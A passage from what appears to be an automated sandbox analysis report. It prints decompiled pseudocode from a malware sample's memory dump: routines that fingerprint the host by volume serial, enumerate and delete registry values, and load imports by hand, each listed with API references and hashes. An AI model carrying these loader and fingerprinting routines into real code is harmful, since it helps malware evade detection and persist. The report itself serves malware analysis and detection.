                                                                                                                                                                                                				WCHAR* _t130;
                                                                                                                                                                                                				void* _t134;
                                                                                                                                                                                                				void* _t141;
                                                                                                                                                                                                				void* _t143;
                                                                                                                                                                                                				WCHAR* _t145;
                                                                                                                                                                                                				signed int _t153;
                                                                                                                                                                                                				void* _t154;
                                                                                                                                                                                                				void* _t178;
                                                                                                                                                                                                				signed int _t180;
                                                                                                                                                                                                				void* _t181;
                                                                                                                                                                                                				void* _t183;
                                                                                                                                                                                                				void* _t187;
                                                                                                                                                                                                				signed int _t188;
                                                                                                                                                                                                				WCHAR* _t190;
                                                                                                                                                                                                				signed int _t191;
                                                                                                                                                                                                				signed int _t192;
                                                                                                                                                                                                				intOrPtr* _t194;
                                                                                                                                                                                                				signed int _t196;
                                                                                                                                                                                                				void* _t199;
                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                				void* _t201;
                                                                                                                                                                                                				void* _t202;
                                                                                                                                                                                                				intOrPtr* _t203;
                                                                                                                                                                                                				void* _t208;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t208 = __fp0;
                                                                                                                                                                                                				_push(_t191);
                                                                                                                                                                                                				_t128 = __edx;
                                                                                                                                                                                                				_t187 = __ecx;
                                                                                                                                                                                                				_t192 = _t191 | 0xffffffff;
                                                                                                                                                                                                				memset( &_v1044, 0, 0x20c);
                                                                                                                                                                                                				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                                                                                                                                                                                				_v1108 = 1;
                                                                                                                                                                                                				if(_t187 != 0) {
                                                                                                                                                                                                					_t123 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                					_t125 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(E00AFBBCF(_t187) != 0) {
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					_t134 = _t128; // executed
                                                                                                                                                                                                					_t66 = E00AFB7EA(_t134,  &_v516); // executed
                                                                                                                                                                                                					_push(_t134);
_v1104 = _t66;
E00AFB6BF(_t66,  &_v1076, _t206, _t208);
_t129 = E00AF49BA( &_v1076,  &_v1076, _t206);
_t141 = E00AFD442( &_v1076, E00AFC3BB( &_v1076), 0);
E00AFB8CC(_t141,  &_v1100, _t208);
_t175 =  &_v1076;
_t73 = E00AF2C82(_t187,  &_v1076, _t206, _t208); // executed
_v1112 = _t73;
_t143 = _t141;
if(_t73 != 0) {
	_push(0);
	_push(_t129);
	_push("\\");
	_t130 = E00AF92C6(_t73);
	_t200 = _t199 + 0x10;
	_t75 =  *0xb0e688; // 0xb20000
	__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
	if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
		L12:
		__eflags = _v1108;
		if(__eflags != 0) {
			_t76 = E00AF91C4(_v1112);
			_t145 = _t130;
			 *0xb0e740 = _t76;
			 *0xb0e738 = E00AF91C4(_t145);
			L17:
			_push(_t145);
			_t80 = E00AF9B24( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
			_t188 = _t80;
			_t201 = _t200 + 0x10;
			__eflags = _t188;
			if(_t188 == 0) {
				goto L41;
			}
			_push(0xb0b9c6);
			E00AF9F13(0xe); // executed
			E00AF9F37(_t188, _t208, _t130); // executed
			_t194 = _a4;
			_v1096 = _v1096 & 0x00000000;
			_push(2);
			_v1100 =  *_t194;
			_push(8);
			_push( &_v1100);
			_t178 = 0xb; // executed
			E00AFA076(_t188, _t178, _t208); // executed
			_t179 =  *(_t194 + 0x10);
			_t202 = _t201 + 0xc;
			__eflags =  *(_t194 + 0x10);
			if( *(_t194 + 0x10) != 0) {
				E00AFA3D8(_t188, _t179, _t208);
			}
			_t180 =  *(_t194 + 0xc);
			__eflags = _t180;
			if(_t180 != 0) {
				E00AFA3D8(_t188, _t180, _t208); // executed
			}
			_t87 = E00AF97ED(0);
			_push(2);
			_v1100 = _t87;
			_t153 = _t188;
			_push(8);
			_v1096 = _t180;
			_push( &_v1100);
			_t181 = 2; // executed
			_t89 = E00AFA076(_t153, _t181, _t208); // executed
			_t203 = _t202 + 0xc;
			__eflags = _v1108;
			if(_v1108 == 0) {
				_t153 =  *0xb0e688; // 0xb20000
				__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
				if(__eflags != 0) {
					_t90 = E00AFFC57(_t89, _t181, _t208, 0, _t130, 0);
					_t203 = _t203 + 0xc;
					goto L26;
				}
				_t153 = _t153 + 0x228;
				goto L25;
			} else {
				_t91 =  *0xb0e688; // 0xb20000
				__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
				if(__eflags != 0) {
					L32:
					__eflags =  *(_t91 + 0x1898) & 0x00000082;
					if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
						_t183 = 0x64;
						E00AFE280(_t183);
					}
					E00AF52B3( &_v1076, _t208);
					_t190 = _a8;
					_t154 = _t153;
					__eflags = _t190;
					if(_t190 != 0) {
						_t94 =  *0xb0e688; // 0xb20000
						__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
						if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
							lstrcpyW(_t190, _t130);
						} else {
							_t96 = E00AF109A(_t154, 0x228);
							_v1100 = _t96;
							lstrcpyW(_t190, _t96);
							E00AF85B6( &_v1100);
							 *_t203 = "\"";
							lstrcatW(_t190, ??);
							lstrcatW(_t190, _t130);
							lstrcatW(_t190, "\"");
						}
					}
					_t93 = _a12;
					__eflags = _t93;
					if(_t93 != 0) {
						 *_t93 = _v1104;
					}
					_t192 = 0;
					__eflags = 0;
					goto L41;
				}
				_t51 = _t91 + 0x228; // 0xb20228
				_t153 = _t51;
				L25:
				_t90 = E00AF5532(_t153, _t130, __eflags);
				L26:
				__eflags = _t90;
				if(_t90 >= 0) {
					_t91 =  *0xb0e688; // 0xb20000
					goto L32;
				}
				_push(0xfffffffd);
				L6:
				_pop(_t192);
				goto L41;
			}
		}
		_t106 = E00AFC2D4(_v1104, __eflags);
		_v1112 = _t106;
		_t107 =  *0xb0e684; // 0x4d3f6c8
		_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
		__eflags = _t108 - _t192;
		if(_t108 != _t192) {
			_t109 =  *0xb0e684; // 0x4d3f6c8
			 *((intOrPtr*)(_t109 + 0x30))();
			E00AF85FB( &_v1148, _t192);
			_t145 = _t108;
			goto L17;
		}
		E00AF85FB( &_v1144, _t192);
		_t81 = 1;
		goto L42;
	}
	_t116 =  *(_t75 + 0x1898);
	__eflags = _t116 & 0x00000004;
	if((_t116 & 0x00000004) == 0) {
		__eflags = _t116;
		if(_t116 != 0) {
			goto L12;
		}
		L11:
		E00AFE2C8(_v1112, _t175);
		goto L12;
	}
	_v1080 = _v1080 & 0x00000000;
	_t118 = E00AF95C2(_t143, 0x879);
	_v1100 = _t118;
	_t175 = _t118;
	E00AFC02E(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                                                                                                                                                                                						E00AF85B6( &_v1100);
                                                                                                                                                                                                						_t200 = _t200 + 0x14;
                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(0xfffffffe);
                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t122 = E00AF2B97( &_v1044, _t192, 0x105); // executed
                                                                                                                                                                                                					_t206 = _t122;
                                                                                                                                                                                                					if(_t122 == 0) {
                                                                                                                                                                                                						L41:
                                                                                                                                                                                                						_t81 = _t192;
                                                                                                                                                                                                						L42:
                                                                                                                                                                                                						return _t81;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}

                                                                                                                                                                                                0x00af4c9a
                                                                                                                                                                                                0x00af4c9a
                                                                                                                                                                                                0x00af4c9c
                                                                                                                                                                                                0x00af4ccb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ccb
                                                                                                                                                                                                0x00af4c9e
                                                                                                                                                                                                0x00af4ad7
                                                                                                                                                                                                0x00af4ad7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4ad7
                                                                                                                                                                                                0x00af4c7d
                                                                                                                                                                                                0x00af4b5c
                                                                                                                                                                                                0x00af4b6a
                                                                                                                                                                                                0x00af4b7d
                                                                                                                                                                                                0x00af4b82
                                                                                                                                                                                                0x00af4b88
                                                                                                                                                                                                0x00af4b8a
                                                                                                                                                                                                0x00af4ba2
                                                                                                                                                                                                0x00af4ba7
                                                                                                                                                                                                0x00af4bb0
                                                                                                                                                                                                0x00af4bb6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4bb6
                                                                                                                                                                                                0x00af4b92
                                                                                                                                                                                                0x00af4b9b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b9b
                                                                                                                                                                                                0x00af4afe
                                                                                                                                                                                                0x00af4b04
                                                                                                                                                                                                0x00af4b06
                                                                                                                                                                                                0x00af4b44
                                                                                                                                                                                                0x00af4b46
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b48
                                                                                                                                                                                                0x00af4b4c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b4c
                                                                                                                                                                                                0x00af4b08
                                                                                                                                                                                                0x00af4b12
                                                                                                                                                                                                0x00af4b1e
                                                                                                                                                                                                0x00af4b29
                                                                                                                                                                                                0x00af4b30
                                                                                                                                                                                                0x00af4b3a
                                                                                                                                                                                                0x00af4b3f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4b3f
                                                                                                                                                                                                0x00af4ad5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4a59
                                                                                                                                                                                                0x00af4a64
                                                                                                                                                                                                0x00af4a6a
                                                                                                                                                                                                0x00af4a6c
                                                                                                                                                                                                0x00af4d57
                                                                                                                                                                                                0x00af4d57
                                                                                                                                                                                                0x00af4d59
                                                                                                                                                                                                0x00af4d5f
                                                                                                                                                                                                0x00af4d5f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af4a6c

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1985475764-0
                                                                                                                                                                                                • Opcode ID: 5efeae36f5d956cbb4802db829bcb033228a75e3bd53ee02b1ba2b7ead5c8702
                                                                                                                                                                                                • Instruction ID: 1287619009077a845f2288d204bad624ff49175983b4143a28590407fa31f22e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5efeae36f5d956cbb4802db829bcb033228a75e3bd53ee02b1ba2b7ead5c8702
                                                                                                                                                                                                • Instruction Fuzzy Hash: F891ED71604308AFE714EBA4DE46F7B73E9AB98310F104A2DF6958B2D1EF70D9058B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                			E00AF6195(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                				int _v16;
                                                                                                                                                                                                				int _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				void* _v32;
                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                				char _v40;
                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                				char _v56;
                                                                                                                                                                                                				void _v576;
                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                				intOrPtr _t72;
                                                                                                                                                                                                				intOrPtr _t80;
                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                				intOrPtr _t82;
                                                                                                                                                                                                				signed int _t85;
                                                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                                                				int _t89;
                                                                                                                                                                                                				intOrPtr _t90;
                                                                                                                                                                                                				intOrPtr _t92;
                                                                                                                                                                                                				void* _t96;
                                                                                                                                                                                                				void* _t97;
                                                                                                                                                                                                				void* _t98;
                                                                                                                                                                                                				void* _t99;
                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t108 = __fp0;
                                                                                                                                                                                                				_t96 = __edx;
                                                                                                                                                                                                				_t89 = 0;
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				memset( &_v576, 0, 0x208);
                                                                                                                                                                                                				_v28 = 0x104;
                                                                                                                                                                                                				_v20 = 0x3fff;
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_t53 = E00AF85E5(0x3fff); // executed
                                                                                                                                                                                                				_t98 = _t53;
                                                                                                                                                                                                				_t100 = _t99 + 0x10;
                                                                                                                                                                                                				_v32 = _t98;
                                                                                                                                                                                                				if(_t98 == 0) {
                                                                                                                                                                                                					L18:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t97 = E00AF85E5(0x800);
                                                                                                                                                                                                				_v36 = _t97;
                                                                                                                                                                                                				if(_t97 == 0) {
                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                                                                                                                                                                                					L15:
                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                						RegCloseKey(_v8);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E00AF85FB( &_v32, 0x3fff);
                                                                                                                                                                                                					E00AF85FB( &_v36, 0x800);
                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_push( &_v56);
                                                                                                                                                                                                				_push( &_v40);
                                                                                                                                                                                                				_push( &_v44);
                                                                                                                                                                                                				_push( &_v48);
                                                                                                                                                                                                				_push( &_v24);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push( &_v28);
                                                                                                                                                                                                				_push( &_v576);
                                                                                                                                                                                                				_t72 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                				_push(_v8);
                                                                                                                                                                                                				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                                                                                                                                                                                					__eflags = _v24;
                                                                                                                                                                                                					if(_v24 == 0) {
                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						memset(_t97, 0, 0x800);
                                                                                                                                                                                                						memset(_t98, 0, 0x3fff);
                                                                                                                                                                                                						_t100 = _t100 + 0x18;
                                                                                                                                                                                                						_v20 = 0x3fff;
                                                                                                                                                                                                						_v16 = 0x800;
                                                                                                                                                                                                						 *_t98 = 0;
                                                                                                                                                                                                						_t80 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                                                                                                                                                                                						__eflags = _t81;
                                                                                                                                                                                                						if(_t81 == 0) {
                                                                                                                                                                                                							_t82 =  *0xb0e690; // 0x4d3f968
                                                                                                                                                                                                							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                                                                                                                                                                                							__eflags = _t90;
                                                                                                                                                                                                							if(_t90 != 0) {
                                                                                                                                                                                                								_t92 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                                                                                                                                                                                								__eflags = _a16;
                                                                                                                                                                                                								if(_a16 != 0) {
                                                                                                                                                                                                									_t85 = E00AFC3D4(_t90);
                                                                                                                                                                                                									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                										__eflags = 0;
                                                                                                                                                                                                										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									E00AFB1F3(_t90, _t96, __eflags, _t108);
                                                                                                                                                                                                								}
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t89 = _v12;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t89 = _t89 + 1;
                                                                                                                                                                                                						_v12 = _t89;
                                                                                                                                                                                                						__eflags = _t89 - _v24;
                                                                                                                                                                                                					} while (_t89 < _v24);
                                                                                                                                                                                                					goto L15;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t87 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                                                                                                                                                                                				goto L15;
                                                                                                                                                                                                			}


                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF61B3
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 00AF620D
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF6276
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF6283
                                                                                                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,00000001), ref: 00AF6322
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$AllocateCloseHeapOpen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1886988140-0
                                                                                                                                                                                                • Opcode ID: 1367f1a79a69561b63bd012557ac8354bc29e6950abf605227f5a317279bb159
                                                                                                                                                                                                • Instruction ID: e9e7820189cf11ba8ce92ec940fc875854b9d0d795c6d46469cb9f5a25f405d3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1367f1a79a69561b63bd012557ac8354bc29e6950abf605227f5a317279bb159
                                                                                                                                                                                                • Instruction Fuzzy Hash: B95126B1A0020DAFDB11DFD4DD85FEEBBB8AF04304F114569F605AB191DB749A08CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E00AFB7EA(WCHAR* __ecx, void* __edx) {
                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                				short _v528;
                                                                                                                                                                                                				short _v1040;
                                                                                                                                                                                                				short _v1552;
                                                                                                                                                                                                				intOrPtr _t23;
                                                                                                                                                                                                				WCHAR* _t27;
                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                				long _t38;
                                                                                                                                                                                                				WCHAR* _t43;
                                                                                                                                                                                                				WCHAR* _t56;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t44 = __ecx;
                                                                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                				_t43 = __edx;
                                                                                                                                                                                                				_t56 = __ecx;
                                                                                                                                                                                                				memset(__edx, 0, 0x100);
                                                                                                                                                                                                				_v12 = 0x100;
                                                                                                                                                                                                				_t23 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
                                                                                                                                                                                                				lstrcpynW(_t43,  &_v528, 0x100);
                                                                                                                                                                                                				_t27 = E00AF95C2(_t44, 0xa88);
                                                                                                                                                                                                				_v16 = _t27;
                                                                                                                                                                                                				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                                                				asm("sbb eax, eax");
                                                                                                                                                                                                				_v8 = _v8 &  ~_t29;
                                                                                                                                                                                                				E00AF85B6( &_v16);
                                                                                                                                                                                                				_t33 = E00AFC3D4(_t43);
                                                                                                                                                                                                				E00AF9621( &(_t43[E00AFC3D4(_t43)]), 0x100 - _t33, L"%u", _v8);
                                                                                                                                                                                                				lstrcatW(_t43, _t56);
                                                                                                                                                                                                				_t38 = E00AFC3D4(_t43);
                                                                                                                                                                                                				_v12 = _t38;
                                                                                                                                                                                                				CharUpperBuffW(_t43, _t38);
                                                                                                                                                                                                				return E00AFD442(_t43, E00AFC3D4(_t43) + _t40, 0);
                                                                                                                                                                                                			}

















                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFB807
                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000100), ref: 00AFB831
                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 00AFB863
                                                                                                                                                                                                  • Part of subcall function 00AF9621: _vsnwprintf.MSVCRT ref: 00AF963E
                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00000114), ref: 00AFB89C
                                                                                                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00AFB8AE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 455400327-0
                                                                                                                                                                                                • Opcode ID: 52d8cb5fdc4971b2a6c4f92748baf9416beb1bbb42790c7ab1a456dbb6a2393e
                                                                                                                                                                                                • Instruction ID: 874641f143eb7214f39031bac2d0ef2d2c57012a6950504642c33120131ad19e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 52d8cb5fdc4971b2a6c4f92748baf9416beb1bbb42790c7ab1a456dbb6a2393e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 852162B2A4021CBFD710ABE4DD4AFBE77ACDB54310F114565F605D7181EE749A488B60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E00AFCFC6(void* __ecx) {
                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                				long _t12;
                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                				struct _OSVERSIONINFOA* _t29;
                                                                                                                                                                                                
                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                				_t29 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				GetCurrentProcess();
                                                                                                                                                                                                				_t11 = E00AFBA47(); // executed
                                                                                                                                                                                                				_t1 = _t29 + 0x1644; // 0xb21644
                                                                                                                                                                                                				_t25 = _t1;
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                                                                                                                                                                                				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                                                                                                                                                                                				_t33 = _t12;
                                                                                                                                                                                                				if(_t12 != 0) {
                                                                                                                                                                                                					_t12 = E00AF8F9F(_t25, _t33);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t3 = _t29 + 0x228; // 0xb20228
                                                                                                                                                                                                				 *(_t29 + 0x1854) = _t12;
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x434)) = E00AF8F9F(_t3, _t33);
                                                                                                                                                                                                				memset(_t29, 0, 0x9c);
                                                                                                                                                                                                				_t29->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                				GetVersionExA(_t29);
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                                				_t17 = E00AFE3F8(_t3);
                                                                                                                                                                                                				_t7 = _t29 + 0x220; // 0xb20220
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                                                                                                                                                                                				_t18 = E00AFE433(_t7); // executed
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                                                                                                                                                                                				return _t18;
                                                                                                                                                                                                			}









                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00B20000,?,00AF3538), ref: 00AFCFD2
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00B21644,00000105,?,?,00B20000,?,00AF3538), ref: 00AFCFF3
                                                                                                                                                                                                • memset.MSVCRT ref: 00AFD024
                                                                                                                                                                                                • GetVersionExA.KERNEL32(00B20000,00B20000,?,00AF3538), ref: 00AFD02F
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00AF3538), ref: 00AFD035
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcess$FileModuleNameVersionmemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3581039275-0
                                                                                                                                                                                                • Opcode ID: 1253f31d58030ce3ab33e9c8547433cfbed0fcf03959b093134b2c25b6e9d110
                                                                                                                                                                                                • Instruction ID: 62172d4d21d1788419aa4256716faa2a2df8ab8bce712b3f9a45d627b2f00953
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1253f31d58030ce3ab33e9c8547433cfbed0fcf03959b093134b2c25b6e9d110
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0011A70901B049FD724AFB0DD4AAEA7BE9EF94310F04082DF69A87291EF746645CB94
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                			E00B024D3(signed int __eax, intOrPtr _a4) {
                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                				signed int* _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                				signed int _v28;
                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                				struct HINSTANCE__* _v48;
                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                				signed int _v56;
                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                				signed int _v64;
                                                                                                                                                                                                				signed int _t109;
                                                                                                                                                                                                				signed int _t112;
                                                                                                                                                                                                				signed int _t115;
                                                                                                                                                                                                				struct HINSTANCE__* _t121;
                                                                                                                                                                                                				void* _t163;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                					_v40 = E00AFE0DB(_v48, "GetProcAddress");
                                                                                                                                                                                                					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                                					_v32 = _v52;
                                                                                                                                                                                                					_t109 = 8;
                                                                                                                                                                                                					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                                						L24:
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_v56 = 0x80000000;
                                                                                                                                                                                                					_t112 = 8;
                                                                                                                                                                                                					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                                					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                                						_v8 = _v8 + 0x14;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t115 = 8;
                                                                                                                                                                                                					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                                					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                                						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                                                                                                                                                                                						_v36 = _t121;
                                                                                                                                                                                                						if(_v36 != 0) {
                                                                                                                                                                                                							if( *_v8 == 0) {
                                                                                                                                                                                                								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_v12 =  *_v8 + _a4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                                							while( *_v12 != 0) {
                                                                                                                                                                                                								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                								_v16 = _v16 & 0x00000000;
